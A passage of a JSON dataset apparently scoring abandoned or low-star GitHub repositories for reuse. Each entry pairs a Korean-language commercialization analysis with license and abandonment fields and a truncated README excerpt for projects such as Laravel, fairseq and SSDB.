**내부 업무 도구**: 회사 직원들이 업무 ","readme_excerpt":"<p align=\"center\"><a href=\"https://laravel.com\" target=\"_blank\"><img src=\"https://raw.githubusercontent.com/laravel/art/master/logo-lockup/5%20SVG/2%20CMYK/1%20Full%20Color/laravel-logolockup-cmyk-red.svg\" width=\"400\"></a></p>\n\n<p align=\"center\">\n<a href=\"https://travis-ci.org/laravel/framework\"><img src=\"https://travis-ci.org/laravel/framework.svg\" alt=\"Build Status\"></a>\n<a href=\"https://packagist.org/packages/laravel/framework\"><img src=\"https://img.shields.io/packagist/dt/laravel/framework\" alt=\"Total Downloads\"></a>\n<a href=\"https://packagist.org/packages/laravel/framework\"><img src=\"https://img.shields.io/packagist/v/laravel/framework\" alt=\"Latest Stable Version\"></a>\n<a href=\"https://packagist.org/packages/laravel/framework\"><img src=\"https://img.shields.io/packagist/l/laravel/framework\" alt=\"License\"></a>\n</p>\n\n## About Laravel\n\nLaravel is a web application framework with expressive, elegant syntax. We believe development must be an enjoyable and creative experience to be truly","composite_score":0.3567,"license_safety_tag":"unknown"},{"name":"lingochamp/FileDownloader","github_url":"https://github.com/lingochamp/FileDownloader","stars":10,"language":"Java","license":"apache-2.0","abandonment_months":22,"description":"# FileDownloader 프로젝트 분석\n\n## 왜 보물인가\n인터넷에서 파일을 안전하고 빠르게 다운로드하는 기술로, 대용량 파일을 받을 때 자주 끊기는 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **동영상 스트리밍 플랫폼**: 사용자가 영화나 강의를 오프라인에서 볼 수 있도록 안정적인 다운로드 기능 제공\n- **클라우드 백업 서비스**:","readme_excerpt":"# FileDownloader\nAndroid multi-task file download engine.\n\n\n[![Download][bintray_svg]][bintray_url]\n![][file_downloader_svg]\n[![Build Status][build_status_svg]][build_status_link]\n[![][filedownloader_snapshot_svg]](https://oss.sonatype.org/content/repositories/snapshots/com/liulishuo/filedownloader/)\n\n> [中文文档](https://github.com/lingochamp/FileDownloader/blob/master/README-zh.md)\n\n## FileDownloader2\n\nNow, [FileDownloader2-OkDownload](https://github.com/lingochamp/okdownload) is released, okdownload will contain all advantage on the FileDownloader and beyond.\n\nBecause of FileDownloader unit-test coverage is very low, so all farther features and enhances will be achieved on the okdownload instead of FileDownloader, and FileDownloader will only focuses on bug fixes.\n\n## DEMO\n\n![][single_demo_gif]\n![][chunked_demo_gif]\n![][serial_tasks_demo_gif]\n![][parallel_tasks_demo_gif]\n![][tasks_manager_demo_gif]\n![][hybrid_test_demo_gif]\n![][avoid_drop_frames_1_gif]\n![][avoid_drop_frames_2_gif]\n\n## I","composite_score":0.3565,"license_safety_tag":"safe"},{"name":"wasabeef/glide-transformations","github_url":"https://github.com/wasabeef/glide-transformations","stars":11,"language":"Java","license":"apache-2.0","abandonment_months":51,"description":"# wasabeef/glide-transformations 사업화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사진을 빠르고 예쁘게 처리해주는 도구로, 개발자들이 복잡한 코드 없이 간단하게 활용할 수 있는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SNS 필터 서비스**: 인스타그램 같은 사진 공유 앱에서 사진을 블러, 회전, 색상 조정 등으로 실시간 ","readme_excerpt":"Glide Transformations\n======================\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-glide--transformations-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/1363)\n[![License](https://img.shields.io/badge/license-Apache%202-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/jp.wasabeef/glide-transformations/badge.svg)](https://search.maven.org/artifact/jp.wasabeef/glide-transformations)\n\nAn Android transformation library providing a variety of image transformations for [Glide](https://github.com/bumptech/glide).\n\nPlease feel free to use this.\n\n\n#### Are you using Picasso or Fresco?\n[Picasso Transformations](https://github.com/wasabeef/picasso-transformations)  \n[Fresco Processors](https://github.com/wasabeef/fresco-processors)\n\n# Demo\n\n### Original Image\n<img src=\"art/demo-org.jpg\" width=\"30%\">\n\n### Transformations\n<img src=\"art/demo.gif\" width=\"50%\">\n\n# How do I use it?\n","composite_score":0.3564,"license_safety_tag":"safe"},{"name":"pytorch/fairseq","github_url":"https://github.com/pytorch/fairseq","stars":12,"language":"Python","license":"mit","abandonment_months":8,"description":"# PyTorch Fairseq 상용화 분석\n\n## 왜 보물인가\n페이스북이 만든 이 도구는 AI가 여러 언어를 자동으로 번역하거나 이해하도록 학습하는 과정을 누구나 쉽게 할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 번역 SaaS**: 기업 이메일·문서를 자동 번역하는 구독형 서비스로 월별 번역량에 따라 과금\n2. **챗봇 내부 도구*","readme_excerpt":"<p align=\"center\">\n  <img src=\"docs/fairseq_logo.png\" width=\"150\">\n  <br />\n  <br />\n  <a href=\"https://opensource.fb.com/support-ukraine\"><img alt=\"Support Ukraine\" src=\"https://img.shields.io/badge/Support-Ukraine-FFD500?style=flat&labelColor=005BBB\" /></a>\n  <a href=\"https://github.com/pytorch/fairseq/blob/main/LICENSE\"><img alt=\"MIT License\" src=\"https://img.shields.io/badge/license-MIT-blue.svg\" /></a>\n  <a href=\"https://github.com/pytorch/fairseq/releases\"><img alt=\"Latest Release\" src=\"https://img.shields.io/github/release/pytorch/fairseq.svg\" /></a>\n  <a href=\"https://github.com/pytorch/fairseq/actions?query=workflow:build\"><img alt=\"Build Status\" src=\"https://github.com/pytorch/fairseq/workflows/build/badge.svg\" /></a>\n  <a href=\"https://fairseq.readthedocs.io/en/latest/?badge=latest\"><img alt=\"Documentation Status\" src=\"https://readthedocs.org/projects/fairseq/badge/?version=latest\" /></a>\n  <a href=\"https://app.circleci.com/pipelines/github/facebookresearch/fairseq/\"><img al","composite_score":0.3562,"license_safety_tag":"safe"},{"name":"ideawu/ssdb","github_url":"https://github.com/ideawu/ssdb","stars":5,"language":"C++","license":"bsd-3-clause","abandonment_months":46,"description":"# SSDB 프로젝트 분석\n\n## 왜 보물인가\n매우 빠르고 가볍게 대량의 데이터를 저장·검색할 수 있는 데이터베이스 솔루션으로, 느린 시스템을 고속화하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소셜 미디어 앱, 메시징 서비스 등에서 사용자 데이터를 빠르게 처리하는 백엔드 기술\n- **내부 업무 도구**: 대기업의 재고 관리","readme_excerpt":"# SSDB - A Redis compatible NoSQL database stored on disk\n\n[![Author](https://img.shields.io/badge/author-@ideawu-blue.svg?style=flat)](http://www.ideawu.net/) [![Platform](https://img.shields.io/badge/platform-Linux,%20BSD,%20OS%20X,%20Windows-green.svg?style=flat)](https://github.com/ideawu/ssdb) [![NoSQL](https://img.shields.io/badge/db-NoSQL-pink.svg?tyle=flat)](https://github.com/ideawu/ssdb) [![License](https://img.shields.io/badge/license-New%20BSD-yellow.svg?style=flat)](LICENSE)\n\n\nSSDB is a high performace key-value(key-string, key-zset, key-hashmap) NoSQL database, __an alternative to Redis__.\n\nSSDB is stable, production-ready and is widely used by many Internet companies including QIHU 360.\n\n## Features\n\n* LevelDB client-server support, written in C/C++\n* Designed to store collection data\n* Persistent key-value, key-zset, key-map('hashmap'), key-list storage\n* Redis clients are supported\n* Client API supports including C++, PHP, Python, Cpy, Java, nodejs, Ruby, Go([see all](","composite_score":0.356,"license_safety_tag":"safe"},{"name":"igorescobar/jQuery-Mask-Plugin","github_url":"https://github.com/igorescobar/jQuery-Mask-Plugin","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":42,"description":"# jQuery-Mask-Plugin 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 전화번호, 주민등록번호, 신용카드 번호 같은 정보를 입력할 때 자동으로 형식을 맞춰주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융 서비스 플랫폼**: 신용카드 결제 페이지에서 \"1234-5678-9012-3456\" 형식으로 자동 정렬되는 입력창 제공\n2. **병원","readme_excerpt":"# jQuery Mask Plugin\nA jQuery Plugin to make masks on form fields and HTML elements.\n\n[![Build Status](https://travis-ci.org/igorescobar/jQuery-Mask-Plugin.png)](https://travis-ci.org/igorescobar/jQuery-Mask-Plugin)\n[![Code Climate](https://codeclimate.com/github/igorescobar/jQuery-Mask-Plugin.png)](https://codeclimate.com/github/igorescobar/jQuery-Mask-Plugin)\n[![jsDelivr Hits](https://data.jsdelivr.com/v1/package/npm/jquery-mask-plugin/badge?style=rounded)](https://www.jsdelivr.com/package/npm/jquery-mask-plugin)\n[![CDNJS](https://img.shields.io/cdnjs/v/jquery.mask.svg)](https://cdnjs.com/libraries/jquery.mask)\n\n# Documentation, Demos & Usage Examples\nhttps://igorescobar.github.io/jQuery-Mask-Plugin/\n\n## Features\n\n  * Lightweight (~2kb minified, ~1kb gziped).\n  * Built-in support for dynamically added elements.\n  * Masks on any HTML element (no need to server-side mask anymore!)!\n  * HTML notation support (data-mask, data-mask-recursive, data-mask-clearifnotmatch).\n  * String/Numeric","composite_score":0.3555,"license_safety_tag":"unknown"},{"name":"RustMagazine/rust_magazine_2021","github_url":"https://github.com/RustMagazine/rust_magazine_2021","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":17,"description":"# Rust Magazine 2021 저장소 분석\n\n## 왜 보물인가\n프로그래밍 언어 'Rust'를 배우고 싶은 사람들을 위해 2021년에 발행된 매거진 자료들을 모아놓은 무료 교육 자료실입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: Rust 프로그래밍 입문자를 위한 구조화된 학습 콘텐츠를 제공하는 유료 강좌로 패키징\n2. **기업 ","readme_excerpt":"# Rust语言开源杂志（2021）\n\n**The roots aren't deep but the seeds are planted!**\n\n![logo](./src/image/rust_magazine3.png)\n\n![logo](./src/image/rm.png)\n\n为了丰富 Rust 社区成员的学习文化生活而特别推出此刊！\n\n- [GitHub Page 阅读](https://rustmagazine.github.io/rust_magazine_2021/)\n- [语雀阅读](https://www.yuque.com/chaosbot/rust_magazine_2021)\n\n## 如何贡献？\n\n为月刊做贡献有下面几种方式：\n\n1. 修正错误：查看每月文章，如果发现错误，可以直接提交 PR 修正。\n2. 补充内容：查看当月对应目录下的markdown文件，如果有标题，但内容空缺，欢迎补充，同样是发 PR。\n3. 新增内容：如果你在当月有想要投稿的文章，可以直接发PR，文章为 markdown 格式，放到当月对应目录下。\n\n### PDF 下载\n\n2021 上半年集合 PDF： [下载](https://github.com/RustMagazine/rust_magazine_2021/releases/tag/0.5)\n\n### 如何订阅本刊 RSS ?\n\n1. 暂时不提供了\n\n\n### 发刊渠道\n\n- [Rustcc 中文社区](https://rustcc.cn)\n- [Rust 视界 Tg Channel](https://t.me/rust_daily_news)\n- [掘金](https://juejin.cn/user/123560414944158)\n- [CITAHub社区](https://talk.citahub.com)\n\n### 支持公司和高校\n\n感谢以下公司和高校大力支持 RustMagazine并贡献内容，排名不分先后。\n\n- 华为\n- PingCAP\n- 蚂蚁集团\n- 溪塔科技\n- 国汽智控\n- 清华大学\n- 期待更多\n\n### 特别感谢\n\n- Rustcc 中文社区\n- 《Rust 日报》小组全体成员\n- 《Rust 唠嗑室》组织者和全体参与者\n\n### 许可\n\n![](./src/image/cc.p","composite_score":0.3554,"license_safety_tag":"safe"},{"name":"thejameskyle/babel-handbook","github_url":"https://github.com/thejameskyle/babel-handbook","stars":7,"language":"","license":"CC-BY-4.0","abandonment_months":23,"description":"# Babel 핸드북 (thejameskyle/babel-handbook)\n\n## 왜 보물인가\n웹 개발자들이 자신의 코드를 최신 기술로 변환해주는 핵심 도구인 Babel을 배우는 공식 학습 자료로, 복잡한 기술을 쉽게 설명한 희귀한 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **개발 교육 SaaS**: 신입 개발자 대상 온라인 강의 플랫폼에서 유료 ","readme_excerpt":"# Babel Handbook\n\nWritten by [Jamie Kyle](https://jamie.build/)\n\nA guided handbook on how to use Babel and how to create plugins for Babel.\n\n**Translations**\n\n- [English](https://github.com/thejameskyle/babel-handbook/tree/master/translations/en/README.md)\n- [Afrikaans](https://github.com/thejameskyle/babel-handbook/tree/master/translations/af/README.md)\n- [العربية](https://github.com/thejameskyle/babel-handbook/tree/master/translations/ar/README.md)\n- [Català](https://github.com/thejameskyle/babel-handbook/tree/master/translations/ca/README.md)\n- [Čeština](https://github.com/thejameskyle/babel-handbook/tree/master/translations/cs/README.md)\n- [Dansk](https://github.com/thejameskyle/babel-handbook/tree/master/translations/da/README.md)\n- [Deutsch](https://github.com/thejameskyle/babel-handbook/tree/master/translations/de/README.md)\n- [Ελληνικά](https://github.com/thejameskyle/babel-handbook/tree/master/translations/el/README.md)\n- [Español](https://github.com/thejameskyle/babel-handboo","composite_score":0.3553,"license_safety_tag":"unknown"},{"name":"apache/incubator-tvm","github_url":"https://github.com/apache/incubator-tvm","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# Apache TVM 상용화 분석\n\n## 왜 보물인가\n인공지능 모델을 어떤 기기에서든 빠르고 효율적으로 실행할 수 있게 해주는 핵심 기술로, 스마트폰부터 데이터센터까지 모든 곳에서 AI를 쓸 수 있게 만듭니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 AI 최적화 SaaS**\n- 스마트폰이나 태블릿에서 빠르게 작동하는 AI 모델을 만들어주는 온라인 서","readme_excerpt":"<!--- Licensed to the Apache Software Foundation (ASF) under one -->\n<!--- or more contributor license agreements.  See the NOTICE file -->\n<!--- distributed with this work for additional information -->\n<!--- regarding copyright ownership.  The ASF licenses this file -->\n<!--- to you under the Apache License, Version 2.0 (the -->\n<!--- \"License\"); you may not use this file except in compliance -->\n<!--- with the License.  You may obtain a copy of the License at -->\n\n<!---   http://www.apache.org/licenses/LICENSE-2.0 -->\n\n<!--- Unless required by applicable law or agreed to in writing, -->\n<!--- software distributed under the License is distributed on an -->\n<!--- \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -->\n<!--- KIND, either express or implied.  See the License for the -->\n<!--- specific language governing permissions and limitations -->\n<!--- under the License. -->\n\n<img src=https://raw.githubusercontent.com/apache/tvm-site/main/images/logo/tvm-logo-small.png width=128","composite_score":0.3553,"license_safety_tag":"safe"},{"name":"deeptibhegde/AttentivePrototypeSFUDA","github_url":"https://github.com/deeptibhegde/AttentivePrototypeSFUDA","stars":5,"language":"Python","license":"unknown","abandonment_months":18,"description":"# AttentivePrototypeSFUDA 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 새로운 상황에 빠르게 적응하면서도 기존 능력을 잃지 않도록 하는 '영리한 학습 기술'입니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 영상 분석 SaaS**: 새로운 병원 데이터에 자동으로 적응하는 진단 보조 소프트웨어\n2. **자동차 카메라 API**: 다양한 날씨와","readme_excerpt":"# Attentive Prototypes for Source-free Unsupervised Domain Adaptive 3D Object Detection\n\nPyTorch code release of the paper \"Attentive Prototypes for Source-free Unsupervised Domain Adaptive 3D Object Detection\",\n\nby [Deepti Hegde](https://deeptibhegde.github.io), [Vishal M. Patel](https://engineering.jhu.edu/vpatel36/sciencex_teams/vishalpatel/)\n\n[[arXiv]](https://arxiv.org/abs/2111.15656)\n\n![image](/imgs/main_final_2.drawio.jpg)\n\n\n\nFollow the instructions for installation from [ST3D](https://github.com/CVMI-Lab/ST3D)\n\n# Dataset preperation\n\n1. Download the relevant datasets: [KITTI](http://www.cvlibs.net/datasets/kitti/eval_object.php?obj_benchmark=3d) , [Waymo](https://waymo.com/intl/en_us/dataset-download-terms/) , [nuScenes](https://www.nuscenes.org/download)\n\n2. Generate the pickle files for each datset\n\n  - KITTI \n      \n      ```\n      python -m pcdet.datasets.kitti.kitti_dataset create_kitti_infos tools/cfgs/dataset_configs/kitti_dataset.yaml\n      ```\n  \n  \n  - nuScenes\n  \n   ","composite_score":0.3551,"license_safety_tag":"unknown"},{"name":"Microsoft/BotBuilder","github_url":"https://github.com/Microsoft/BotBuilder","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":5,"description":"# Microsoft/BotBuilder 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 챗봇 구축 도구로, 기업들이 고객 상담이나 업무 자동화용 AI 대화 프로그램을 쉽게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **고객 상담 SaaS**: 전자상거래 회사가 이 도구로 24시간 자동 상담봇을 만들어 월 구독료로 판매\n- **내부 업무 도구**","readme_excerpt":"# ARCHIVE NOTICE:\n\nThe Bot Framework SDK is being retired with final long term support ending December 2025. This means that this project will no longer be updated or maintained. Customers using this tool will not be disrupted and bots built with the SDK will continue to function. However, the tool will no longer be supported through service tickets in the Azure portal and will *not* receive any product or feature updates. It will not have any regular non-critical dependency updates.\n\nTo build agents with your choice of AI services, orchestration, and knowledge, consider using the [Microsoft 365 Agents SDK](aka.ms/agents). The Agents SDK is GA and has support for C#, JavaScript or Python. You can learn more about the Agents SDK at aka.ms/agents. If you're looking for a SaaS-based agent platform, consider Microsoft Copilot Studio. If you have an existing bot built with the Bot Framework SDK, you can update your bot to the Agents SDK. You can review the core changes and updates at Bot Fr","composite_score":0.355,"license_safety_tag":"safe"},{"name":"ArthurHub/Android-Image-Cropper","github_url":"https://github.com/ArthurHub/Android-Image-Cropper","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":33,"description":"# Android-Image-Cropper 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사진을 자르고 편집하는 기능을 쉽게 추가할 수 있는 도구로, 사진 관련 앱 개발자들에게 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **프로필 사진 편집 SaaS**: SNS, 채용 플랫폼에서 사용자가 프로필 사진을 자르고 조정할 수 있는 웹 서비스\n2. *","readme_excerpt":"Android Image Cropper\n=======\n\n# :triangular_flag_on_post: The Project is NOT currently maintained :triangular_flag_on_post:\n\n## Please use **[CanHub's fork](https://github.com/CanHub/Android-Image-Cropper)!**\n\n### Thank everybody for using the library. It was very fun to create and a privilage to help you build awesome apps.\n### The same way I took an unmaintained initial implementation from [edmodo](https://github.com/edmodo/cropper), I'm happy to see [CanHub](https://github.com/CanHub/Android-Image-Cropper) taking it now.\n### Good luck and happy coding :octocat:\n\n\n----\n----\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Android--Image--Cropper-green.svg?style=true)](https://android-arsenal.com/details/1/3487)\n[![Build Status](https://travis-ci.org/ArthurHub/Android-Image-Cropper.svg?branch=master)](https://travis-ci.org/ArthurHub/Android-Image-Cropper)\n\n**Powerful** (Zoom, Rotation, Multi-Source), **customizable** (Shape, Limits, Style), **optimized** (Async, Sam","composite_score":0.3549,"license_safety_tag":"safe"},{"name":"CodeHubApp/CodeHub","github_url":"https://github.com/CodeHubApp/CodeHub","stars":10,"language":"C#","license":"unknown","abandonment_months":48,"description":"","readme_excerpt":"<a href=\"http://codehub-app.com/\"><img alt=\"CodeHub\" src=\"https://raw.githubusercontent.com/thedillonb/CodeHub/gh-pages/assets/CodeHubTitle.jpg\" width=\"100%\"></a>\n\n[![Gitter](https://badges.gitter.im/thedillonb/CodeHub.svg)](https://gitter.im/thedillonb/CodeHub?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\nCodeHub is the best way to browse and maintain your GitHub repositories on any iPhone, iPod Touch, and iPad device! Keep an eye on your projects with the ability to view everything from pull requests to commenting on individual file diffs in the latest change set. CodeHub brings GitHub to your finger tips in a sleek and efficient design. \n\nFollow the project on twitter: [@CodeHubApp](http://www.twitter.com/CodeHubApp)<br />\nFeature requests can be made on [GitHub](https://github.com/CodeHubApp/CodeHub/issues)<br />\nAdditional information can be found on the [project's webpage](http://codehub-app.com/)\n\n## Screenshots\n\n\n<img alt=\"Repository View\" src=\"https://raw.github.co","composite_score":0.3546,"license_safety_tag":"unknown"},{"name":"alexjc/neural-enhance","github_url":"https://github.com/alexjc/neural-enhance","stars":5,"language":"Python","license":"agpl-3.0","abandonment_months":66,"description":"# Neural Enhance 상용화 분석\n\n## 왜 보물인가\n흐릿하거나 작은 사진을 AI가 자동으로 선명하고 깔끔하게 만들어주는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n사진 품질 개선 웹사이트를 만들어 개인 사용자가 휴대폰 사진을 업로드하면 자동으로 고화질로 변환해주는 서비스\n\n**2. 내부 업무 도구**\n부동산 중개소나 전","readme_excerpt":"Neural Enhance\n==============\n\n.. image:: docs/OldStation_example.gif\n\n**Example #1** — Old Station: `view comparison <http://enhance.nucl.ai/w/0f5177f4-9ce6-11e6-992c-c86000be451f/view>`_ in 24-bit HD, `original photo <https://flic.kr/p/oYhbBv>`_ CC-BY-SA @siv-athens.\n\n----\n\n`As seen on TV! <https://www.youtube.com/watch?v=LhF_56SxrGk>`_ What if you could increase the resolution of your photos using technology from CSI laboratories? Thanks to deep learning and ``#NeuralEnhance``, it's now possible to train a neural network to zoom in to your images at 2x or even 4x.  You'll get even better results by increasing the number of neurons or training with a dataset similar to your low resolution image.\n\nThe catch? The neural network is hallucinating details based on its training from example images. It's not reconstructing your photo exactly as it would have been if it was HD. That's only possible in Hollywood — but using deep learning as \"Creative AI\" works and it is just as cool!  Here's ","composite_score":0.3546,"license_safety_tag":"risky"},{"name":"wensonsmith/YoudaoTranslator","github_url":"https://github.com/wensonsmith/YoudaoTranslator","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":12,"description":"# YoudaoTranslator 분석 보고서\n\n## 왜 보물인가\n유도(중국 최대 사전 플랫폼)의 번역 기술을 활용해 다국어 콘텐츠를 자동으로 번역해주는 도구로, 글로벌 비즈니스 확장 시 번역 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 콘텐츠 제작자를 위한 웹 기반 번역 플랫폼 (원클릭 다국어 콘텐츠 배포)\n\n","readme_excerpt":"\n# YoudaoTranslate | 有道翻译  \n\n<p align=\"left\">\n<img alt=\"GitHub stars\" src=\"https://visitor-badge.laobi.icu/badge?page_id=wensonsmith.YoudaoTranslate\"/>\n<img alt=\"GitHub stars\" src=\"https://img.shields.io/github/stars/wensonsmith/YoudaoTranslate?style=social\"/>\n</p>\n\n![screenshot_1](screenshots/screenshot_1.png)\n\n## ⚠️ V3 更新说明\n该版本使用 TS 重构，自带运行环境，不再依赖 PHP。同时支持多个平台的 API。\n\nmacOS Monterey 请使用 V3 版本！\n\n标记为施工中 (🚧) 特性 V3 尚未支持，如果需要使用，请切换到 V2 使用。\n\n## 特性\n- 🌟 [**无系统环境依赖**]() - 自带 [txiki](https://github.com/saghul/txiki.js) 运行环境，不再需要 PHP\n- 🌟 [**多平台支持**]() - 支持百度的翻译API\n- 🌐 [**中英文自动互翻**]() - 支持 `CamelCase` 驼峰短语翻译，长句自动换行\n- 🎭 [**多语言支持**](screenshots/multi.jpg) - 可以识别中文、英文、日文、韩文、法文、俄文等\n- 🎹 [**快捷键支持**]() - 双击 `⌥ Alt`  直接翻译选中内容\n- 📢 [**英文发音**](screenshots/screenshot_3.png) - `⌘ Command` + `↩︎ Enter` 本地发音，`⌥ Alt` + `↩︎ Enter`  调用有道在线语音发音\n- 🚧 [**有道翻译生词本**](screenshots/word-book.jpg) - 可以将陌生单词加入有道生词本\n- 📃 [**回车复制**]() - 在选项上 `↩︎ Enter` 回车复制翻译结果\n- 🚧 [**查询历史**](screenshots/translate_history.gif) -  `yd *` 查询最近的翻译","composite_score":0.3546,"license_safety_tag":"unknown"},{"name":"mTvare6/hello-world.rs","github_url":"https://github.com/mTvare6/hello-world.rs","stars":48,"language":"RenderScript","license":"NOASSERTION","abandonment_months":12,"description":"# hello-world.rs 기술 자산 분석\n\n## 왜 보물인가\n프로그래밍 초심자부터 전문가까지 누구나 쉽게 시작할 수 있는 러스트 언어 학습 자료로, 48개의 별을 받으며 커뮤니티에서 입증된 가치 있는 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n\n1. **프로그래밍 교육 플랫폼**: 온라인 코딩 학원이나 무크(MOOC) 서비스에 러스트 입문 커리큘럼","readme_excerpt":"# 🚀 hello-world.rs 🚀\n\n🚀 Memory safe, blazing fast, minimal and configurable hello world project written in the rust(🚀) programming language 🚀\n\n🚀 While this depends on more c code than rust(🚀) code to compile, because rust(🚀) is magically **memory safe**, now all c code is memory safe too 🚀\n\n🚀 This project is very minimal, it only requires **1247** crates 🚀\n\n### Building\n\nTo compile this project you need only one library 🚀:\n\n<div>1. <a href=\"https://www.cairographics.org/download/\">cairo development libraries</a> 🚀.</div>\n<div>1. <a href=\"https://www.gtk.org/docs/installations/\">libgtk development libraries</a> 🚀.</div>\n<div>1. alsa-lib 🚀</div>\n<div>1. glfw 🚀</div>\n<div>1. freetype 🚀</div>\n<div>1. libglib 🚀</div>\n<div>1. pango 🚀</div>\n<div>1. atk 🚀</div>\n<div>1. pixbuf 🚀</div>\n<div>1. gdk 🚀</div>\n<div>1. vulkan(moltenVK on mac) 🚀</div>\n</br>\n<div>Just a single library 🚀</div>\n</br>\n\nYou probably have most of them already, if it says something along the words, you know what to search for","composite_score":0.3546,"license_safety_tag":"unknown"},{"name":"ribot/android-guidelines","github_url":"https://github.com/ribot/android-guidelines","stars":11,"language":"","license":"apache-2.0","abandonment_months":59,"description":"# Android Guidelines 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱을 만들 때 따라야 할 규칙과 최고의 방법들을 정리해놓은 실무 가이드북으로, 앱 개발 팀이 일관성 있고 품질 높은 제품을 만드는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발사의 내부 표준 도구**: 개발 팀원들이 참고하는 코딩 규칙 및 디자인 가","readme_excerpt":"Thank you for your interest in ribot’s development work. Unfortunately there are no current plans to make any changes to this project in the near future, and it is not being maintained or updated. We hope you still find this a useful resource and you can check out the newest recommendations in [Android Jetpack](https://developer.android.com/jetpack/) for more ideas!\n\n# Android Guidelines\n\nList of guidelines that we use at [ribot](http://ribot.co.uk) when developing for the __Android__ platform. \n\n* [Project and code style guidelines](project_and_code_guidelines.md)\n* [Architecture Guidelines](architecture_guidelines/android_architecture.md)\n\n### License\n\n```\nCopyright 2015 Ribot Ltd.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n    http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under th","composite_score":0.3543,"license_safety_tag":"safe"},{"name":"vue3/vue3-News","github_url":"https://github.com/vue3/vue3-News","stars":5,"language":"","license":"MIT","abandonment_months":13,"description":"# vue3/vue3-News 프로젝트 분석\n\n## 왜 보물인가\nVue 3라는 인기 있는 웹 개발 도구를 이용해 뉴스를 빠르게 보여주는 웹사이트를 만드는 기술로, 현대적인 뉴스 플랫폼을 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 큐레이션 SaaS**: 특정 주제(금융, 기술, 스포츠 등)의 뉴스만 모아서 보여주는 구독 서비스로 개","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/vue3/vue3-News/raw/master/asset/vue3-news-logo.png\" alt=\"vue3-News\" title=\"vue3-News\">\n</p>\n<p align=\"center\">\n  <img src=\"https://img.shields.io/badge/2023+-【何以解忧，唯有暴富】-red.svg?style=for-the-badge&logo=angellist\">\n</p>\n<p align=\"center\">\n  <img src=\"https://img.shields.io/badge/vue-3+-3eaf7c.svg?style=flat-square&logo=vue.js\" />\n  <img src=\"https://img.shields.io/badge/vueCLI-3+-orange.svg?style=flat-square&logo=vue.js\" />\n  <img src=\"https://img.shields.io/badge/vue3-UI-ff69b4.svg?style=flat-square&logo=vue.js\" />\n  <img src=\"https://img.shields.io/badge/license-MIT-ccc.svg?style=flat-square&logo=reliance-industries-limited\" />\n  <img src=\"https://img.shields.io/github/stars/vue3/vue3-News?style=flat-square&logo=github\" />\n</p>\n\n# Vue3+ & Vue-CLI3+ 开发生态圈资讯\n\n<!--\n// 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣\n-->\n\n🚀 欢迎`Star`，后续会不断更新。  \n🇨🇳 最后更新日期：2️⃣0️⃣2️⃣5️⃣  \n🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳\n\n2025 年您好，(_´▽ ｀)ノノ_)，继续前行！  \n【2025】 ≡≡≡≡≡≡≡≡----","composite_score":0.3541,"license_safety_tag":"safe"},{"name":"beto-rodriguez/Live-Charts","github_url":"https://github.com/beto-rodriguez/Live-Charts","stars":5,"language":"C#","license":"mit","abandonment_months":39,"description":"# Live-Charts 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 보기 좋은 그래프와 차트로 자동 변환해주는 기술로, 비즈니스 데이터 시각화가 필요한 모든 회사에 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 판매 현황, 고객 분석, 성과 대시보드를 표시하는 웹 분석 플랫폼\n2. **내부 업무 도구**: 회계팀이 월별 예산 집","readme_excerpt":"<p align=\"center\">\n  <a href=\"http://http://v0.lvcharts.com/\"><img src=\"http://v0.lvcharts.com/Content/Images/LiveChartsWhite.gif\" /></a>\n</p>\n\n# This project will continue in another repo, please see  [LiveCharts2](https://github.com/Live-Charts/LiveCharts2) for more info\n\n# ~~LiveCharts 1.0 is coming soon (ETA AprilSeptember 2018)!~~\n\n~~We are doing a full rewrite of the library with all the learned lessons, the new version is focused on:~~\n\n~~* **If you own the Geared package** the new high performance version is already yours! thank you very much for all your support!~~\n\n~~* 